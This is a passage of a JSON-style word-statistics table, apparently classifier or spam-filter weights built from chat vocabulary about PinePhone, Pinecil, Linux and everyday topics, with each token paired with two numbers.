"troubleshooting": [65535, 0], "cutting": [65535, 0], "dynamite": [65535, 0], "clogged": [65535, 0], "toilet": [65535, 0], "txasom": [65535, 0], "tukru": [65535, 0], "noob": [65535, 0], "mechanic": [65535, 0], "bolts": [65535, 0], "foot": [65535, 0], "ratchet": [65535, 0], "theblindearthican": [65535, 0], "insightful": [65535, 0], "undergrad": [65535, 0], "uchile": [65535, 0], "cl": [65535, 0], "carreras": [65535, 0], "ingenieria": [65535, 0], "civil": [65535, 0], "computacion": [65535, 0], "cyclingembassy": [65535, 0], "ejb": [65535, 0], "rgwrgcnshjfqigkina": [65535, 0], "fuab": [65535, 0], "poisoning": [65535, 0], "fumes": [65535, 0], "automotive": [65535, 0], "repairs": [65535, 0], "familairize": [65535, 0], "cri": [65535, 0], "carpet": [65535, 0], "melt": [65535, 0], "voids": [65535, 0], "bateria": [65535, 0], "readout": [65535, 0], "emojis": [65535, 0], "ubitx": [65535, 0], "amzn": [65535, 0], "fxg": [65535, 0], "finger": [65535, 0], "accuse": [65535, 0], "scream": [65535, 0], "alcohol": [65535, 0], "cup": [65535, 0], "deadline": [65535, 0], "badusb": [65535, 0], "drawn": [65535, 0], "sum": [20045, 45490], "yknow": [65535, 0], "zephyrlabs": [65535, 0], "katta": [65535, 0], "usbnet": [65535, 0], "counts": [65535, 0], "jk": [6503, 59032], "scrolled": [65535, 0], "swear": [65535, 0], "jar": [65535, 0], "ezpz": [65535, 0], "confirming": [65535, 0], "sadness": [65535, 0], "crack": [65535, 0], "eggs": [65535, 0], "omelette": [65535, 0], "subway": [65535, 0], "origins": [65535, 0], "gw": [65535, 0], "jsut": [65535, 0], "clic": [8393, 57142], "exe": [65535, 0], "launches": [65535, 0], "forgetting": [65535, 0], "jumpers": [65535, 0], "sufficiently": [65535, 0], "crossing": [65535, 0], "t's": [65535, 0], "dotting": [65535, 0], "i's": [65535, 0], "daren": [65535, 0], "brcmfmac": [65535, 0], "plt": [65535, 0], "index": [65535, 0], "invalid": [65535, 0], "exec": [65535, 0], "flags": [65535, 0], "realiable": [65535, 0], "buck": [65535, 0], "bunny": [65535, 0], "rescue": [65535, 0], "ranchester": [65535, 0], "mirdorph": [65535, 0], "patched": [65535, 0], "libav": [65535, 0], "ffmpeg": [65535, 0], "recycle": [65535, 0], "solveable": [65535, 0], "polynomial": [65535, 0], "li": [65535, 0], "ion": [65535, 0], "broader": [65535, 0], "cobalt": [65535, 0], "exposure": [65535, 0], "purmaps": [65535, 0], "afternoon": [65535, 0], "segf": [65535, 0], "goldberg": [65535, 0], "emu": [65535, 0], "wiretap": [65535, 0], "recipe": [65535, 0], "pancakes": [65535, 0], "fall": [65535, 0], "advise": [6503, 59032], "toys": [65535, 0], "fingernails": [65535, 0], "accoun": [65535, 0], "eoanermine": [65535, 0], "relayed": [65535, 0], "armour": [65535, 0], "opensource": [65535, 0], "usd": [13183, 52352], "ages": [65535, 0], "italy": [65535, 0], "amounts": [65535, 0], "heath": [65535, 0], "explaination": [65535, 0], "speculating": [65535, 0], "bear": [65535, 0], "bossman": [65535, 0], "amp": [65535, 0], "mains": [65535, 0], "voltate": [65535, 0], "daoab": [65535, 0], "encourage": [65535, 0], "malfunctioning": [65535, 0], "pinecil's": [65535, 0], "safeties": [65535, 0], "seek": [65535, 0], "pets": [65535, 0], "afci": [65535, 0], "warnings": [65535, 0], "finishes": [65535, 0], "wallet": [3230, 62305], "preference": [65535, 0], "python's": [65535, 0], "pip": [65535, 0], "sticker": [65535, 0], "hal": [65535, 0], "arduinocore": [65535, 0], "dependence": [65535, 0], "ide": [65535, 0], "retailer": [65535, 0], "besides": [65535, 0], "rma": [65535, 0], "utilities": [65535, 0], "dancing": [65535, 0], "quotation": [65535, 0], "periods": [65535, 0], "towboot": [65535, 0], "drivig": [65535, 0], "suss": [65535, 0], "costed": [65535, 0], "wasnt": [65535, 0], "functionnality": [65535, 0], "smses": [65535, 0], "eater's": [65535, 0], "technolva": [65535, 0], "experts": [11832, 53703], "established": [20045, 45490], "conditions": [65535, 0], "computing": [65535, 0], "bsd": [65535, 0], "clause": [65535, 0], "paperclip": [65535, 0], "lighter": [65535, 0], "frugal": [65535, 0], "garage": [65535, 0], "stability": [65535, 0], "phantom": [65535, 0], "devcube": [65535, 0], "busted": [65535, 0], "spacemeowx": [65535, 0], "thanx": [65535, 0], "distribute": [65535, 0], "imx": [65535, 0], "brymen": [65535, 0], "bm": [65535, 0], "clarifing": [65535, 0], "ahold": [65535, 0], "combophy": [65535, 0], "landed": [65535, 0], "forced": [65535, 0], "slap": [65535, 0], "yourgood": [65535, 0], "newb": [65535, 0], "headsup": [65535, 0], "ticketing": [65535, 0], "numlock": [65535, 0], "lock": [41813, 23722], "pause": [65535, 0], "caught": [65535, 0], "wfvp": [65535, 0], "intellisense": [65535, 0], "troubleshoot": [65535, 0], "apkbuild": [65535, 0], "wars": [65535, 0], "osmand": [65535, 0], "fdroid": [65535, 0], "leaks": [65535, 0], "menu": [65535, 0], "branch": [65535, 0], "saveenv": [65535, 0], "showed": [65535, 0], "wiring": [65535, 0], "forth": [65535, 0], "sm": [20045, 45490], "cycle": [65535, 0], "reduces": [65535, 0], "vacation": [65535, 0], "fr": [65535, 0], "distcc": [65535, 0], "distributed": [20045, 45490], "issuep": [65535, 0], "reviews": [65535, 0], "cig": [65535, 0], "fuses": [65535, 0], "voided": [65535, 0], "bike": [65535, 0], "shoulder": [65535, 0], "twisty": [65535, 0], "roads": [65535, 0], "ppc": [65535, 0], "macs": [65535, 0], "endian": [65535, 0], "thicc": [65535, 0], "collection": [65535, 0], "laws": [65535, 0], "pointing": [65535, 0], "travelign": [65535, 0], "military": [65535, 0], "contractor": [65535, 0], "hadn": [65535, 0], "bookmarked": [65535, 0], "unknowns": [65535, 0], "unsettling": [65535, 0], "avoided": [65535, 0], "advance": [65535, 0], "existing": [65535, 0], "whatsapp": [65535, 0], "pienphone": [65535, 0], "ezee": [65535, 0], "symbol": [65535, 0], "magically": [65535, 0], "hair": [65535, 0], "dryer": [65535, 0], "disallowed": [65535, 0], "invented": [30700, 34835], "purchasing": [65535, 0], "accoutn": [65535, 0], "xorg": [65535, 0], "vibrating": [65535, 0], "gif's": [65535, 0], "shortcodes": [65535, 0], "dizzy": [65535, 0], "woke": [65535, 0], "dimension": [65535, 0], "nspawn": [65535, 0], "daemons": [65535, 0], "xhost": [65535, 0], "unable": [65535, 0], "displa": [65535, 0], "jackets": [65535, 0], "starbound": [65535, 0], "pokemon": [65535, 0], "detective": [65535, 0], "pikachu": [65535, 0], "speakers": [65535, 0], "overworked": [65535, 0], "screams": [65535, 0], "networkmanager": [65535, 0], "testpoints": [65535, 0], "hiddensky": [2149, 63386], "jlpcb": [65535, 0], "sponsoring": [65535, 0], "youtubers": [65535, 0], "benchmarked": [65535, 0], "eink": [65535, 0], "rotation": [65535, 0], "bookwork": [65535, 0], "csv": [65535, 0], "tsv": [65535, 0], "vcf": [65535, 0], "backlog": [65535, 0], "requests": [65535, 0], "csi": [65535, 0], "okok": [65535, 0], "pinmux": [65535, 0], "cif": [65535, 0], "clkouta": [65535, 0], "nekocahlan": [65535, 0], "korean": [65535, 0], "chargeable": [65535, 0], "telecom": [65535, 0], "epr": [65535, 0], "cuty": [65535, 0], "wfl": [65535, 0], "repeats": [65535, 0], "providing": [20045, 45490], "overheat": [65535, 0], "gentlemen": [65535, 0], "ladies": [65535, 0], "behold": [65535, 0], "educational": [65535, 0], "companion": [65535, 0], "tel": [20045, 45490], "screamo": [65535, 0], "classical": [65535, 0], "hiphop": [65535, 0], "izphhb": [65535, 0], "beaethoven": [65535, 0], "prase": [65535, 0], "piped": [65535, 0], "kavin": [65535, 0], "rocks": [65535, 0], "hsh": [65535, 0], "xlxmjm": [65535, 0], "uniden": [65535, 0], "ltw": [65535, 0], "hostage": [65535, 0], "equator": [65535, 0], "simslot": [65535, 0], "ledger": [30700, 34835], "blockchain": [8393, 57142], "implementing": [65535, 0], "gptc": [65535, 0], "corect": [65535, 0], "undead": [65535, 0], "improve": [65535, 0], "breathing": [65535, 0], "happening": [30700, 34835], "sourcevr": [65535, 0], "dig": [65535, 0], "leaning": [65535, 0], "toggle": [65535, 0], "curves": [65535, 0], "fuel": [65535, 0], "gauge": [65535, 0], "isa": [65535, 0], "curr": [65535, 0], "encouragement": [8393, 57142], "thankful": [20045, 45490], "reports": [65535, 0], "fools": [65535, 0], "errand": [65535, 0], "filling": [65535, 0], "sun": [65535, 0], "rtc": [65535, 0], "vqmmc": [65535, 0], "aldo": [65535, 0], "pwrseq": [65535, 0], "enhanced": [65535, 0], "strobe": [65535, 0], "waves": [65535, 0], "thank's": [65535, 0], "eprcil": [65535, 0], "groping": [65535, 0], "abc": [65535, 0], "vaccinated": [65535, 0], "beginner": [65535, 0], "thankyoy": [65535, 0], "bwian": [65535, 0], "drakes": [65535, 0], "analysis": [20045, 45490], "smartass": [65535, 0], "definition": [65535, 0], "localized": [65535, 0], "dpa": [65535, 0], "san": [65535, 0], "fluent": [65535, 0], "japanese": [65535, 0], "maskrom": [65535, 0], "elden": [65535, 0], "ring": [65535, 0], "prong": [65535, 0], "grounded": [65535, 0], "fomo": [65535, 0], "tactic": [65535, 0], "eater": [65535, 0], "gaining": [20045, 45490], "weight": [65535, 0], "patient": [37311, 28224], "poisons": [65535, 0], "imac": [65535, 0], "duckduckgo": [65535, 0], "pinephonetkeyt": [65535, 0], "shelll": [65535, 0], "immensely": [65535, 0], "sector": [65535, 0], "nop": [65535, 0], "spacers": [65535, 0], "openglass": [65535, 0], "tilt": [65535, 0], "wakeup": [65535, 0], "capacitive": [65535, 0], "slider": [65535, 0], "experiences": [65535, 0], "verification": [65535, 0], "finstaticman": [65535, 0], "hahahah": [65535, 0], "jouletheif's": [65535, 0], "strongly": [65535, 0], "disagree": [65535, 0], "hosted": [65535, 0], "repos": [65535, 0], "competently": [65535, 0], "efi": [65535, 0], "stub": [65535, 0], "who's": [65535, 0], "emailing": [65535, 0], "harsh": [65535, 0], "reminder": [65535, 0], "pad": [65535, 0], "kek": [65535, 0], "recommendations": [37311, 28224], "genuine": [5308, 60227], "duffey": [65535, 0], "bbw": [65535, 0], "basketball": [65535, 0], "wives": [65535, 0], "phony": [65535, 0], "jbc": [65535, 0], "humble": [65535, 0], "explanations": [65535, 0], "applicable": [65535, 0], "debit": [65535, 0], "generating": [8393, 57142], "worlds": [30700, 34835], "pinned": [65535, 0], "optimised": [65535, 0], "cvi\u010disko": [65535, 0], "marcin": [65535, 0], "fave": [65535, 0], "sinatra": [65535, 0], "roda": [65535, 0], "buyers": [20045, 45490], "deletion": [65535, 0], "hahhahhahhahahhaahaha": [65535, 0], "michelelul": [65535, 0], "infinisim": [65535, 0], "fren": [65535, 0], "independently": [65535, 0], "phiten": [65535, 0], "approaches": [65535, 0], "responsive": [65535, 0], "constant": [65535, 0], "\u0101\u0101\u0101\u0101\u0101\u0101": [65535, 0], "bluecil": [65535, 0], "hipoity": [65535, 0], "hopoity": [65535, 0], "crypti": [65535, 0], "spammed": [65535, 0], "thousand": [20045, 45490], "robert": [65535, 0], "efuse": [65535, 0], "optional": [65535, 0], "jumper": [65535, 0], "fnb": [65535, 0], "reprogram": [65535, 0], "reinstalled": [65535, 0], "remotely": [65535, 0], "triggerable": [65535, 0], "killer": [65535, 0], "keychron": [65535, 0], "maker": [65535, 0], "sonixqmk": [65535, 0], "rooted": [65535, 0], "spuds": [65535, 0], "julian": [65535, 0], "zb": [65535, 0], "scores": [65535, 0], "subscription": [65535, 0], "fight": [30700, 34835], "wch": [65535, 0], "speaks": [65535, 0], "millitestnetbitcoins": [65535, 0], "cyesnavv": [65535, 0], "tester": [65535, 0], "dogekek": [65535, 0], "laugh": [65535, 0], "touched": [65535, 0], "zx": [65535, 0], "futureproofed": [65535, 0], "bundling": [65535, 0], "valid": [65535, 0], "learnt": [20045, 45490], "threadripper's": [65535, 0], "routinely": [65535, 0], "unchanged": [65535, 0], "troubles": [65535, 0], "passing": [65535, 0], "lust": [65535, 0], "cleanse": [65535, 0], "scourge": [65535, 0], "smp": [65535, 0], "preempt": [65535, 0], "cst": [65535, 0], "aarch": [65535, 0], "clipboard": [65535, 0], "pianobar": [65535, 0], "mar": [10411, 55124], "multimedia": [65535, 0], "simplified": [20045, 45490], "interchange": [65535, 0], "regularly": [65535, 0], "perfexion": [65535, 0], "approved": [65535, 0], "greetings": [65535, 0], "score": [65535, 0], "hackable": [65535, 0], "bh": [65535, 0], "dorian's": [65535, 0], "repartitioning": [65535, 0], "android's": [65535, 0], "hyper": [65535, 0], "uploading": [65535, 0], "handwired": [65535, 0], "thu": [65535, 0], "utc": [65535, 0], "bendemctl": [65535, 0], "plz": [65535, 0], "oct": [20045, 45490], "freecad": [65535, 0], "gzip": [65535, 0], "sys": [65535, 0], "xxx": [65535, 0], "taskenter": [65535, 0], "critical": [65535, 0], "limping": [65535, 0], "wilsonjholmes": [65535, 0], "buried": [65535, 0], "blissful": [65535, 0], "waterfall": [65535, 0], "funded": [30700, 34835], "spaces": [65535, 0], "perhapos": [65535, 0], "reaching": [65535, 0], "overseas": [65535, 0], "limtek'": [65535, 0], "ping'd": [65535, 0], "beeps": [65535, 0], "catchup": [65535, 0], "novel": [65535, 0], "thise": [65535, 0], "truely": [65535, 0], "qualified": [11832, 53703], "skipped": [65535, 0], "qkgyp": [65535, 0], "gifv": [65535, 0], "cis": [65535, 0], "iy": [65535, 0], "cy": [20045, 45490], "waveform": [65535, 0], "swaybar": [65535, 0], "detailed": [65535, 0], "insight": [65535, 0], "apologies": [65535, 0], "bflflash": [65535, 0], "petercxy": [65535, 0], "evdev": [65535, 0], "emulation": [65535, 0], "orrr": [65535, 0], "earthmoney": [65535, 0], "sells": [65535, 0], "supporters": [65535, 0], "threat": [65535, 0], "ranked": [20045, 45490], "jacks": [65535, 0], "oak": [65535, 0], "bliss": [65535, 0], "zorick": [65535, 0], "bby": [65535, 0], "buuild": [65535, 0], "rule": [65535, 0], "vulkan": [65535, 0], "zinq": [65535, 0], "ordouble": [65535, 0], "tapping": [65535, 0], "passcode": [65535, 0], "followed": [65535, 0], "linuxwacom": [65535, 0], "wacom": [65535, 0], "hid": [65535, 0], "descriptors": [65535, 0], "contributing": [65535, 0], "captive": [65535, 0], "onooooo": [65535, 0], "tinkering": [65535, 0], "tek": [65535, 0], "annoy": [65535, 0], "oc": [65535, 0], "throttling": [65535, 0], "irda": [65535, 0], "whassup": [65535, 0], "puppylinux": [65535, 0], "represent": [65535, 0], "sdl": [65535, 0], "programs": [65535, 0], "'installed'": [65535, 0], "cdrw": [65535, 0], "poutine": [65535, 0], "canadian": [65535, 0], "fries": [65535, 0], "expertise": [65535, 0], "kimchi": [65535, 0], "sauerkraut": [65535, 0], "sout": [65535, 0], "reuben": [65535, 0], "sandwiches": [65535, 0], "jornada": [65535, 0], "openmoko": [65535, 0], "imartyn": [65535, 0], "pierogis": [65535, 0], "'kraut": [65535, 0], "cocktail": [65535, 0], "sausages": [65535, 0], "family's": [65535, 0], "newyears": [1135, 64400], "mess": [65535, 0], "modes": [65535, 0], "psk": [65535, 0], "planetside": [65535, 0], "belonged": [65535, 0], "grandfather": [65535, 0], "slightest": [65535, 0], "wireguard": [65535, 0], "wwan": [65535, 0], "aight": [65535, 0], "imma": [65535, 0], "gifs": [65535, 0], "cope": [65535, 0], "floppa": [65535, 0], "gregory": [65535, 0], "copeium": [65535, 0], "copium": [65535, 0], "stickermule": [65535, 0], "unixstickers": [65535, 0], "prime": [65535, 0], "sotre": [65535, 0], "panfrost": [65535, 0], "xffffffff": [65535, 0], "accelerated": [65535, 0], "unified": [65535, 0], "powersave": [65535, 0], "ondemand": [65535, 0], "unstable": [65535, 0], "shobelaugh": [65535, 0], "youtubes": [65535, 0], "vp": [65535, 0], "rawdraw": [65535, 0], "artifacts": [65535, 0], "curren": [65535, 0], "developement": [65535, 0], "wechat": [65535, 0], "degoogled": [65535, 0], "overall": [65535, 0], "mandatory": [65535, 0], "ignorant": [20045, 45490], "lalalala": [65535, 0], "manjoro": [65535, 0], "megi's": [65535, 0], "beaerlin": [65535, 0], "gadgetcontroller": [65535, 0], "snaps": [65535, 0], "gross": [65535, 0], "shunt": [65535, 0], "resitor": [65535, 0], "validating": [65535, 0], "awhile": [65535, 0], "land": [65535, 0], "lag": [65535, 0], "cef": [65535, 0], "respective": [65535, 0], "mmsd": [65535, 0], "tng": [65535, 0], "reduce": [65535, 0], "meanwhile": [65535, 0], "handwarmer": [65535, 0], "displeased": [65535, 0], "diederik": [65535, 0], "estimation": [65535, 0], "ootb": [65535, 0], "applies": [65535, 0], "nobel": [65535, 0], "prize": [65535, 0], "antarctica": [65535, 0], "diff": [65535, 0], "scsi": [65535, 0], "slim": [65535, 0], "bay": [65535, 0], "natively": [65535, 0], "einval": [65535, 0], "wstring": [65535, 0], "posix": [65535, 0], "nico": [65535, 0], "em": [65535, 0], "bghb": [65535, 0], "kqapxs": [65535, 0], "defaults": [65535, 0], "edk": [65535, 0], "umm": [65535, 0], "chmod": [65535, 0], "shm": [65535, 0], "tcm": [65535, 0], "superslicer": [65535, 0], "ambushes": [65535, 0], "trend": [11832, 53703], "collector": [65535, 0], "intensify": [65535, 0], "colorado": [65535, 0], "mountains": [65535, 0], "excitable": [65535, 0], "cwqxnzu": [65535, 0], "smallest": [65535, 0], "portland": [65535, 0], "eugene": [65535, 0], "yachats": [65535, 0], "unfarmiliar": [65535, 0], "smartctl": [65535, 0], "cmd": [65535, 0], "streamable": [65535, 0], "pexrud": [65535, 0], "shirt": [65535, 0], "eleven": [65535, 0], "bothered": [65535, 0], "pack": [65535, 0], "advanced": [65535, 0], "spoiler": [65535, 0], "alert": [65535, 0], "pebkac": [65535, 0], "cry": [20045, 45490], "encounter": [20045, 45490], "investigate": [65535, 0], "ejabberd": [65535, 0], "beinvolved": [65535, 0], "comparable": [65535, 0], "openqti": [65535, 0], "minimalistic": [65535, 0], "okey": [65535, 0], "recursive": [65535, 0], "unrn": [11832, 53703], "mzjk": [8393, 57142], "synchronize": [65535, 0], "yaaaaaaaaaaaaaaaaaaaaaaaa": [65535, 0], "qso": [65535, 0], "practice": [65535, 0], "morsecode": [65535, 0], "yer": [65535, 0], "alphabet": [65535, 0], "canmen": [65535, 0], "fost": [65535, 0], "million": [65535, 0], "dollar": [65535, 0], "contracts": [65535, 0], "ppkb": [65535, 0], "ghosting": [65535, 0], "effects": [65535, 0], "pulmonary": [65535, 0], "embolisms": [65535, 0], "dvt": [65535, 0], "curve": [65535, 0], "loony": [65535, 0], "converter": [65535, 0], "increases": [65535, 0], "stratagy": [65535, 0], "imbitchespetme": [65535, 0], "paru": [65535, 0], "aosp": [65535, 0], "calculator": [65535, 0], "palmos": [65535, 0], "bumped": [65535, 0], "rejected": [65535, 0], "crappy": [65535, 0], "anthony": [65535, 0], "martinez": [65535, 0], "endians": [65535, 0], "listener": [65535, 0], "knee": [65535, 0], "brace": [65535, 0], "challenges": [8393, 57142], "enjoyable": [65535, 0], "fish": [65535, 0], "salt": [65535, 0], "nmcli": [65535, 0], "designware": [65535, 0], "superspeed": [65535, 0], "fault": [65535, 0], "suffering": [5308, 60227], "amdgpu": [65535, 0], "whoops": [65535, 0], "explosion": [65535, 0], "medications": [65535, 0], "psychological": [65535, 0], "evaluation": [65535, 0], "ringing": [65535, 0], "countless": [65535, 0], "manuals": [65535, 0], "themasterdon": [65535, 0], "replwvmmde": [65535, 0], "blu": [65535, 0], "tack": [65535, 0], "anime": [65535, 0], "betrayal": [65535, 0], "ink": [30700, 34835], "vibes": [65535, 0], "arived": [65535, 0], "wohoo": [65535, 0], "beetlejuice": [65535, 0], "proposed": [65535, 0], "directv": [65535, 0], "carburetors": [65535, 0], "sneak": [30700, 34835], "glorified": [65535, 0], "viewer": [65535, 0], "roberts": [65535, 0], "alpha": [65535, 0], "trans": [65535, 0], "actions": [20045, 45490], "ascii": [65535, 0], "blobtonguewink": [65535, 0], "cai": [65535, 0], "dat": [65535, 0], "nguon": [65535, 0], "dien": [65535, 0], "c\u00e0i": [65535, 0], "\u0111\u1eb7t": [65535, 0], "ngu\u1ed3n": [65535, 0], "\u0111i\u1ec7n": [65535, 0], "invisible": [65535, 0], "phonetically": [65535, 0], "diacretical": [65535, 0], "marks": [11832, 53703], "emojii": [65535, 0], "ikea": [65535, 0], "egyption": [65535, 0], "hieroglyphs": [65535, 0], "squeekboard": [65535, 0], "goodness": [20045, 45490], "gracious": [65535, 0], "supertuxart": [65535, 0], "unplayably": [65535, 0], "deathmath": [65535, 0], "microsdcard": [65535, 0], "percent": [11832, 53703], "smarter": [20045, 45490], "overlooked": [20045, 45490], "hectic": [65535, 0], "bummer": [65535, 0], "pi's": [65535, 0], "volunteering": [65535, 0], "daniel": [65535, 0], "da": [11832, 53703], "bonnet": [65535, 0], "ppkeyboard": [65535, 0], "bon": [65535, 0], "app\u00e9tit": [65535, 0], "accesibility": [65535, 0], "lulz": [65535, 0], "itx": [65535, 0], "invitation": [65535, 0], "mobain": [65535, 0], "gist": [65535, 0], "dids": [65535, 0], "aa": [5308, 60227], "bcf": [65535, 0], "fca": [65535, 0], "creations": [65535, 0], "colleague": [11832, 53703], "guidoguenther": [65535, 0], "ironically": [65535, 0], "yogaslackers": [65535, 0], "teacher": [65535, 0], "slacker": [65535, 0], "emacs": [65535, 0], "wouldnt": [65535, 0], "strategy": [65535, 0], "koreniko": [65535, 0], "gold": [11832, 53703], "kvm": [65535, 0], "hypervisor": [65535, 0], "rufus": [65535, 0], "leste": [65535, 0], "shitter": [65535, 0], "processed": [11832, 53703], "alsa": [65535, 0], "whateverelseimissed": [65535, 0], "wlc": [65535, 0], "kindly": [3059, 62476], "saudia": [65535, 0], "arabia": [65535, 0], "gpgsv": [65535, 0], "glgsv": [65535, 0], "smoothly": [37311, 28224], "mpv": [65535, 0], "totem": [65535, 0], "affected": [20045, 45490], "complicates": [65535, 0], "alef": [65535, 0], "administrator": [11832, 53703], "xp": [20045, 45490], "wr": [65535, 0], "nv": [20045, 45490], "stumbled": [20045, 45490], "numpad": [65535, 0], "blendering": [65535, 0], "mental": [65535, 0], "strength": [65535, 0], "obd": [65535, 0], "duties": [65535, 0], "tty": [65535, 0], "bind": [65535, 0], "unbind": [65535, 0], "peterson": [65535, 0], "brownouts": [65535, 0], "states": [65535, 0], "alee": [65535, 0], "je": [20045, 45490], "tok": [65535, 0], "bepieoe": [65535, 0], "landauers": [65535, 0], "principle": [65535, 0], "zettajoules": [65535, 0], "ot": [3881, 61654], "wen": [65535, 0], "thermostat": [65535, 0], "sub": [65535, 0], "optimal": [65535, 0], "'till": [65535, 0], "therecount": [65535, 0], "forvhwdvo": [65535, 0], "rco": [65535, 0], "siqqmoa": [65535, 0], "purely": [65535, 0], "subjective": [65535, 0], "composite": [65535, 0], "cmontrump": [65535, 0], "nsa": [65535, 0], "botnet": [65535, 0], "pointers": [65535, 0], "pmbootsrap": [65535, 0], "ncarton": [65535, 0], "shower": [65535, 0], "wearing": [65535, 0], "pinetimes": [65535, 0], "bosnia": [65535, 0], "herzegovina": [65535, 0], "asembly": [65535, 0], "gula\u0161": [65535, 0], "vdo": [65535, 0], "aspects": [37311, 28224], "appealing": [65535, 0], "librem": [65535, 0], "florida": [20045, 45490], "tasks": [65535, 0], "imagines": [65535, 0], "wiping": [65535, 0], "acetone": [65535, 0], "donate": [65535, 0], "thedigital": [65535, 0], "fsms": [65535, 0], "pmu": [65535, 0], "documented": [65535, 0], "addresses": [11832, 53703], "shakes": [65535, 0], "fist": [65535, 0], "qtwebkiosk": [65535, 0], "philosophical": [65535, 0], "pontification": [65535, 0], "lawyers": [65535, 0], "characterization": [65535, 0], "michelesus": [65535, 0], "droidian": [65535, 0], "wlroots": [65535, 0], "ea": [30700, 34835], "cfbcb": [65535, 0], "ccb": [20045, 45490], "dfecc": [65535, 0], "cyfmac": [65535, 0], "clm": [65535, 0], "ae": [7328, 58207], "eeeaba": [65535, 0], "brcm": [65535, 0], "bcm": [65535, 0], "hcd": [65535, 0], "author": [65535, 0], "porting": [65535, 0], "lurker": [65535, 0], "papergami": [65535, 0], "snake": [65535, 0], "dozens": [65535, 0], "various": [34352, 31183], "varieties": [65535, 0], "subreddits": [65535, 0], "paranoid": [65535, 0], "pyrolyzed": [65535, 0], "bread": [65535, 0], "asahilinux": [65535, 0], "resident": [65535, 0], "silence": [65535, 0], "msis": [65535, 0], "dgpus": [65535, 0], "xperia": [65535, 0], "xa": [20045, 45490], "sailfish": [65535, 0], "decentralized": [20045, 45490], "telenoobnormiesgram": [65535, 0], "standards": [65535, 0], "escaz": [65535, 0], "agreement": [65535, 0], "quartzphone": [65535, 0], "mirrors": [65535, 0], "ww": [11832, 53703], "microchip": [65535, 0], "downloads": [65535, 0], "devicedoc": [65535, 0], "dabutcha": [65535, 0], "speakerphone": [65535, 0], "seemes": [65535, 0], "irritating": [65535, 0], "sds": [65535, 0], "borked": [65535, 0], "gdm": [65535, 0], "nadal": [65535, 0], "alcaraz": [65535, 0], "hat": [65535, 0], "believes": [65535, 0], "mine's": [65535, 0], "nawal": [65535, 0], "kish": [65535, 0], "microvolts": [65535, 0], "introduced": [4484, 61051], "locking": [65535, 0], "starchild": [65535, 0], "recommending": [11832, 53703], "pentesting": [65535, 0], "education": [65535, 0], "ported": [65535, 0], "mokomaze": [65535, 0], "atmel": [65535, 0], "seeprom": [65535, 0], "pinning": [65535, 0], "meam": [65535, 0], "filing": [65535, 0], "fosstodon": [65535, 0], "bshah": [65535, 0], "glosses": [65535, 0], "las": [4484, 61051], "vegas": [65535, 0], "whalecils": [65535, 0], "htc": [65535, 0], "tytn": [65535, 0], "ii": [65535, 0], "domain": [65535, 0], "blacklists": [65535, 0], "sends": [65535, 0], "receives": [11832, 53703], "mat": [65535, 0], "dpi": [65535, 0], "inquire": [65535, 0], "tutanotateam": [65535, 0], "watashi": [65535, 0], "wa": [20045, 45490], "erasing": [65535, 0], "kibyte": [65535, 0], "deferred": [65535, 0], "blanking": [65535, 0], "mmcblk": [65535, 0], "fedoraproject": [65535, 0], "sofdefaultforintellpe": [65535, 0], "truncate": [65535, 0], "goals": [30700, 34835], "king": [65535, 0], "shea": [65535, 0], "street": [65535, 0], "differential": [65535, 0], "erected": [65535, 0], "cloudy": [65535, 0], "gamer": [65535, 0], "rgbs": [65535, 0], "dualboot": [65535, 0], "doublelaughl": [65535, 0], "ihs": [65535, 0], "contributed": [11832, 53703], "thickness": [65535, 0], "startupnotify": [65535, 0], "redsus": [65535, 0], "alexmitter": [65535, 0], "bust": [65535, 0], "cookie": [65535, 0], "tins": [65535, 0], "needles": [65535, 0], "acquired": [65535, 0], "accomplish": [65535, 0], "backlit": [65535, 0], "pinephne": [65535, 0], "keyboasrd": [65535, 0], "guitar": [65535, 0], "medium": [65535, 0], "thief": [65535, 0], "adreas": [65535, 0], "obeys": [65535, 0], "keymap": [65535, 0], "intelmas": [65535, 0], "deb": [65535, 0], "stripthink": [65535, 0], "completion": [65535, 0], "robertlipe": [65535, 0], "wombat": [65535, 0], "cute": [65535, 0], "synchronizing": [65535, 0], "databases": [65535, 0], "dmytrokuleba": [65535, 0], "twsrc": [65535, 0], "etfw": [65535, 0], "ctwcamp": [65535, 0], "etweetembed": [65535, 0], "ctwterm": [65535, 0], "ctwgr": [65535, 0], "ctwcon": [65535, 0], "fwww": [65535, 0], "pravda": [65535, 0], "fnews": [65535, 0], "axe": [65535, 0], "altogether": [65535, 0], "barba": [65535, 0], "flatkill": [65535, 0], "ussr": [65535, 0], "laughing": [65535, 0], "happysad": [65535, 0], "mohammad": [65535, 0], "willingness": [20045, 45490], "award": [65535, 0], "thunderysteak": [65535, 0], "bombard": [65535, 0], "beautiful": [65535, 0], "selfies": [65535, 0], "clothes": [65535, 0], "maaaaaan": [65535, 0], "edram": [65535, 0], "optimization": [65535, 0], "cargo": [26080, 39455], "fortunately": [26080, 39455], "probabilistic": [65535, 0], "aks": [65535, 0], "primality": [65535, 0], "lepmwh": [65535, 0], "yg": [540, 64995], "assets": [65535, 0], "amuniversal": [65535, 0], "abb": [65535, 0], "fbb": [65535, 0], "ed": [65535, 0], "ab": [9820, 55715], "ef": [20045, 45490], "fdcdd": [65535, 0], "df": [20045, 45490], "cf": [20045, 45490], "cac": [65535, 0], "fabbff": [65535, 0], "rungameid": [65535, 0], "steamappid": [65535, 0], "puppet": [65535, 0], "gzdoom": [65535, 0], "invaluable": [65535, 0], "morrowind": [65535, 0], "openmw": [65535, 0], "castle": [65535, 0], "crashers": [65535, 0], "playable": [65535, 0], "peoples": [8393, 57142], "proceed": [65535, 0], "ama": [65535, 0], "pmbootstrap": [65535, 0], "crimiertech": [65535, 0], "apk": [65535, 0], "fifo": [65535, 0], "getattr": [65535, 0], "args": [65535, 0], "pmb": [65535, 0], "fsprogs": [65535, 0], "youdidit": [65535, 0], "passive": [65535, 0], "cooled": [65535, 0], "vvweapon": [65535, 0], "virtualbox": [65535, 0], "unrecognized": [65535, 0], "arguments": [65535, 0], "stargate": [65535, 0], "sill": [65535, 0], "darm": [65535, 0], "eabi": [65535, 0], "toolchain": [65535, 0], "dnrf": [65535, 0], "winning": [8393, 57142], "'pinephone": [65535, 0], "refused": [65535, 0], "mrcool": [65535, 0], "pavucontrol": [65535, 0], "globaltennisnetwork": [65535, 0], "blockchains": [65535, 0], "grow": [11832, 53703], "infinitely": [65535, 0], "exponentially": [65535, 0], "stressfull": [65535, 0], "yna": [65535, 0], "kr": [65535, 0], "aen": [65535, 0], "troll": [65535, 0], "wget": [65535, 0], "mobianfde": [65535, 0], "cnxsoft": [65535, 0], "openoch": [65535, 0], "pretzy": [65535, 0], "staight": [65535, 0], 